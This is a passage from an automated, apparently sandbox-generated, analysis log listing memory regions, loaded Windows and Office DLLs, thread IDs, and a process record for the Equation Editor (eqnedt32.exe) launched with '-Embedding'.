"\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 700 start_va = 0x7ffb54e50000 end_va = 0x7ffb54f92fff monitored = 0 entry_point = 0x7ffb54e78210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 701 start_va = 0x7ffb543d0000 end_va = 0x7ffb5464cfff monitored = 0 entry_point = 0x7ffb544a4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 702 start_va = 0x7ffb540d0000 end_va = 0x7ffb54139fff monitored = 0 entry_point = 0x7ffb54106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 703 start_va = 0x24e11160000 end_va = 0x24e1125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11160000" filename = "" Region: id = 704 start_va = 0x24e11160000 end_va = 0x24e11166fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11160000" filename = "" Region: id = 705 start_va = 0x24e11250000 end_va = 0x24e1125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11250000" filename = "" Region: id = 706 start_va = 0x24e11170000 end_va = 0x24e111a8fff monitored = 0 entry_point = 0x24e111712f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 707 start_va = 0x24e11360000 end_va = 0x24e114e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11360000" filename = "" Region: id = 708 start_va = 0x7ffb56da0000 end_va = 0x7ffb56ddafff monitored = 0 entry_point = 0x7ffb56da12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 728 start_va = 0x24e11170000 end_va = 0x24e11170fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11170000" filename = "" Region: id = 729 start_va = 0x24e11180000 end_va = 0x24e11180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11180000" filename = "" Region: id = 730 start_va = 0x24e11190000 end_va = 0x24e1124ffff monitored = 0 entry_point = 0x24e111b0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 731 start_va = 0x24e114f0000 end_va = 0x24e11670fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e114f0000" filename = "" Region: id = 732 start_va = 0x24e11680000 end_va = 0x24e12a7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11680000" filename = "" Region: id = 733 start_va = 0x24e11190000 end_va = 0x24e11190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e11190000" filename = "" Region: id = 734 start_va = 0x24e111a0000 end_va = 0x24e111a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e111a0000" filename = "" Region: id = 735 start_va = 0x24e12a80000 end_va = 0x24e12b5cfff monitored = 0 entry_point = 0x24e12ade0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 736 start_va = 0x7ffb53470000 end_va = 0x7ffb5347efff monitored = 0 entry_point = 0x7ffb53473210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 737 start_va = 0x7ffb51df0000 end_va = 0x7ffb51e85fff monitored = 0 entry_point = 0x7ffb51e15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 738 start_va = 0x24e12a80000 end_va = 0x24e12c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12a80000" filename = "" Region: id = 772 start_va = 0x7ffb375a0000 end_va = 0x7ffb378a3fff monitored = 0 entry_point = 0x7ffb37646094 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 773 start_va = 0x24e111b0000 end_va = 0x24e111b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e111b0000" filename = "" Region: id = 774 start_va = 0x7ffb56cd0000 end_va = 0x7ffb56d90fff monitored = 0 entry_point = 0x7ffb56cf0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 775 start_va = 0x7ffb46ad0000 end_va = 0x7ffb46b60fff monitored = 0 entry_point = 0x7ffb46b22430 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 776 start_va = 0x7ffb46ac0000 end_va = 0x7ffb46acbfff monitored = 0 entry_point = 0x7ffb46ac4150 region_type = mapped_file name = "vcruntime140_1.dll" filename = "\\Windows\\System32\\vcruntime140_1.dll" (normalized: "c:\\windows\\system32\\vcruntime140_1.dll") Region: id = 777 start_va = 0x24e111c0000 end_va = 0x24e111cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e111c0000" filename = "" Region: id = 778 start_va = 0x7ffb37120000 end_va = 0x7ffb37597fff monitored = 0 entry_point = 0x7ffb37199154 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 779 start_va = 0x24e111d0000 end_va = 0x24e111d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e111d0000" filename = "" Region: id = 780 start_va = 0x7ffb36830000 end_va = 0x7ffb3711afff monitored = 0 entry_point = 0x7ffb36935a48 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 781 start_va = 0x24e111e0000 end_va = 0x24e111e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e111e0000" filename = "" Region: id = 782 start_va = 0x7ffb41990000 end_va = 0x7ffb41b38fff monitored = 0 entry_point = 0x7ffb419e4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 783 start_va = 0x7ffb36060000 end_va = 0x7ffb3682bfff monitored = 0 entry_point = 0x7ffb360f5f94 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 784 start_va = 0x24e111f0000 end_va = 0x24e111f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e111f0000" filename = "" Region: id = 785 start_va = 0x7ffb3de60000 end_va = 0x7ffb3de66fff monitored = 0 entry_point = 0x7ffb3de61220 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 786 start_va = 0x7ffb51c60000 end_va = 0x7ffb51c84fff monitored = 0 entry_point = 0x7ffb51c75220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 787 start_va = 0x7ffb51c00000 end_va = 0x7ffb51c24fff monitored = 0 entry_point = 0x7ffb51c02300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 788 start_va = 0x7ffb34d80000 end_va = 0x7ffb3605bfff monitored = 0 entry_point = 0x7ffb34d8caf0 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 789 start_va = 0x24e11200000 end_va = 0x24e11201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11200000" filename = "" Region: id = 790 start_va = 0x24e12a80000 end_va = 0x24e12b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12a80000" filename = "" Region: id = 791 start_va = 0x24e12c10000 end_va = 0x24e12c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12c10000" filename = "" Region: id = 792 start_va = 0x7ffb46780000 end_va = 0x7ffb46ab9fff monitored = 0 entry_point = 0x7ffb46788520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 793 start_va = 0x24e11210000 end_va = 0x24e11211fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11210000" filename = "" Region: id = 794 start_va = 0x7ffb55770000 end_va = 0x7ffb56ccefff monitored = 0 entry_point = 0x7ffb558d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 795 start_va = 0x7ffb54200000 end_va = 0x7ffb54242fff monitored = 0 entry_point = 0x7ffb54214b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 796 start_va = 0x7ffb53520000 end_va = 0x7ffb53b63fff monitored = 0 entry_point = 0x7ffb536e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 797 start_va = 0x7ffb56df0000 end_va = 0x7ffb56e41fff monitored = 0 entry_point = 0x7ffb56dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 798 start_va = 0x7ffb54140000 end_va = 0x7ffb541f4fff monitored = 0 entry_point = 0x7ffb541822e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 799 start_va = 0x7ffb53480000 end_va = 0x7ffb534cafff monitored = 0 entry_point = 0x7ffb534835f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 800 start_va = 0x7ffb534d0000 end_va = 0x7ffb534e3fff monitored = 0 entry_point = 0x7ffb534d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 801 start_va = 0x7ffb53300000 end_va = 0x7ffb53328fff monitored = 0 entry_point = 0x7ffb53314530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 810 start_va = 0x7ffb48250000 end_va = 0x7ffb484c3fff monitored = 0 entry_point = 0x7ffb482c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 811 start_va = 0x24e11220000 end_va = 0x24e11220fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 812 start_va = 0x24e11230000 end_va = 0x24e11231fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11230000" filename = "" Region: id = 813 start_va = 0x24e12c20000 end_va = 0x24e12dd8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 814 start_va = 0x7ffb4ff10000 end_va = 0x7ffb50454fff monitored = 0 entry_point = 0x7ffb500aa450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 815 start_va = 0x7ffb54ae0000 end_va = 0x7ffb54c39fff monitored = 0 entry_point = 0x7ffb54b238e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 816 start_va = 0x7ffb51be0000 end_va = 0x7ffb51bf2fff monitored = 0 entry_point = 0x7ffb51be2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 817 start_va = 0x7ffb53280000 end_va = 0x7ffb532d5fff monitored = 0 entry_point = 0x7ffb53290bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 820 start_va = 0x7ffb51190000 end_va = 0x7ffb51231fff monitored = 0 entry_point = 0x7ffb511b0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 821 start_va = 0x7ffb521f0000 end_va = 0x7ffb52219fff monitored = 0 entry_point = 0x7ffb521f8b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 826 start_va = 0x24e12de0000 end_va = 0x24e130e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 827 start_va = 0x24e130f0000 end_va = 0x24e13a10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 828 start_va = 0x7ffb146b0000 end_va = 0x7ffb146bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb146b0000" filename = "" Region: id = 829 start_va = 0x24e13a20000 end_va = 0x24e1885efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 838 start_va = 0x24e11220000 end_va = 0x24e1122efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 839 start_va = 0x24e11240000 end_va = 0x24e11240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11240000" filename = "" Region: id = 840 start_va = 0x24e12b10000 end_va = 0x24e12bcbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e12b10000" filename = "" Region: id = 841 start_va = 0x24e11240000 end_va = 0x24e11243fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e11240000" filename = "" Region: id = 842 start_va = 0x24e12a80000 end_va = 0x24e12a86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12a80000" filename = "" Region: id = 843 start_va = 0x24e12af0000 end_va = 0x24e12b0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12af0000" filename = "" Region: id = 844 start_va = 0x24e18860000 end_va = 0x24e189affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e18860000" filename = "" Region: id = 845 start_va = 0x24e189b0000 end_va = 0x24e18ce6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 846 start_va = 0x24e18cf0000 end_va = 0x24e18e6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 847 start_va = 0x7ffb4ca60000 end_va = 0x7ffb4ccbffff monitored = 0 entry_point = 0x7ffb4cb0b5b0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 851 start_va = 0xd8cfc00000 end_va = 0xd8cfcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8cfc00000" filename = "" Region: id = 852 start_va = 0xd8cfd00000 end_va = 0xd8cfdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8cfd00000" filename = "" Region: id = 853 start_va = 0x7ffb514f0000 end_va = 0x7ffb51511fff monitored = 0 entry_point = 0x7ffb514f1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 854 start_va = 0x7ffb4b900000 end_va = 0x7ffb4b931fff monitored = 0 entry_point = 0x7ffb4b9211c0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 855 start_va = 0x7ffb4b680000 end_va = 0x7ffb4b6e1fff monitored = 0 entry_point = 0x7ffb4b681a50 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 856 start_va = 0x7ffb51240000 end_va = 0x7ffb514e7fff monitored = 0 entry_point = 0x7ffb512d3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 857 start_va = 0x7ffb50460000 end_va = 0x7ffb506cefff monitored = 0 entry_point = 0x7ffb505122b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 864 start_va = 0x24e12a90000 end_va = 0x24e12abdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e12a90000" filename = "" Region: id = 865 start_va = 0x24e12ac0000 end_va = 0x24e12ac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e12ac0000" filename = "" Region: id = 866 start_va = 0x24e12ad0000 end_va = 0x24e12ad0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12ad0000" filename = "" Region: id = 867 start_va = 0x24e12ae0000 end_va = 0x24e12ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12ae0000" filename = "" Region: id = 868 start_va = 0xd8cfe00000 end_va = 0xd8cfefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8cfe00000" filename = "" Region: id = 881 start_va = 0xd8cff00000 end_va = 0xd8cfffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8cff00000" filename = "" Region: id = 882 start_va = 0xd8d0000000 end_va = 0xd8d00fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8d0000000" filename = "" Region: id = 883 start_va = 0x24e12bd0000 end_va = 0x24e12bd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12bd0000" filename = "" Region: id = 884 start_va = 0x24e12be0000 end_va = 0x24e12be0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e12be0000" filename = "" Region: id = 885 start_va = 0x7ffb4b110000 end_va = 0x7ffb4b12ffff monitored = 0 entry_point = 0x7ffb4b111920 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 886 start_va = 0x7ffb4b100000 end_va = 0x7ffb4b10bfff monitored = 0 entry_point = 0x7ffb4b101860 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 887 start_va = 0x24e12bf0000 end_va = 0x24e12bf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e12bf0000" filename = "" Region: id = 893 start_va = 0xd8d0100000 end_va = 0xd8d01fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d8d0100000" filename = "" Region: id = 894 start_va = 0x24e12c00000 end_va = 0x24e12c04fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e12c00000" filename = "" Region: id = 895 start_va = 0x24e18e70000 end_va = 0x24e1966ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024e18e70000" filename = "" Region: id = 896 start_va = 0x24e18860000 end_va = 0x24e18864fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ospintl.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\1033\\ospintl.dll" (normalized: "c:\\program files\\microsoft office\\office16\\1033\\ospintl.dll") Region: id = 897 start_va = 0x24e189a0000 end_va = 0x24e189affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024e189a0000" filename = "" Region: id = 898 start_va = 0x7ffb34b50000 end_va = 0x7ffb34d72fff monitored = 0 entry_point = 0x7ffb34b52bf0 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 910 start_va = 0x7ffb40130000 end_va = 0x7ffb4029ffff monitored = 0 entry_point = 0x7ffb40263158 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msptls.dll") Thread: id = 26 os_tid = 0x13b0 Thread: id = 27 os_tid = 0x13ac Thread: id = 29 os_tid = 0x648 Thread: id = 30 os_tid = 0x790 Thread: id = 33 os_tid = 0xbc0 Thread: id = 34 os_tid = 0x1110 Thread: id = 35 os_tid = 0x10fc Thread: id = 40 os_tid = 0x1190 Process: id = "4" image_name = "eqnedt32.exe" filename = "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe" page_root = "0x2daf4000" os_pid = "0xdcc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x270" cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fc8c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1112 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1113 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1114 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1115 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1116 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1117 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1118 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1119 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1120 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1121 start_va = 0x400000 end_va = 0x48dfff monitored = 0 entry_point = 0x44cd40 region_type = mapped_file name = "eqnedt32.exe" filename = "\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.exe") Region: id = 1122 start_va = 0x77840000 end_va = 0x779bafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1123 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1124 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1125 start_va = 0x7fff0000 end_va = 0x7ffb56e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1126 start_va = 0x7ffb56e50000 end_va = 0x7ffb57010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1127 start_va = 0x7ffb57011000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb57011000" filename = "" Region: id = 1128 start_va = 0x490000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 1129 start_va = 0x52570000 end_va = 0x525bffff monitored = 0 entry_point = 0x52588180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1130 start_va = 0x524f0000 end_va = 0x52569fff monitored = 0 entry_point = 0x52503290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1131 start_va = 0x76b60000 end_va = 0x76c3ffff monitored = 0 entry_point = 0x76b73980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1132 start_va = 0x525c0000 end_va = 0x525c7fff monitored = 0 entry_point = 0x525c17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1133 start_va = 0x550000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1134 start_va = 0x76b60000 end_va = 0x76c3ffff monitored = 0 entry_point = 0x76b73980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1135 start_va = 0x771a0000 end_va = 0x7731dfff monitored = 0 entry_point = 0x77251b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1136 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1137 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1138 start_va = 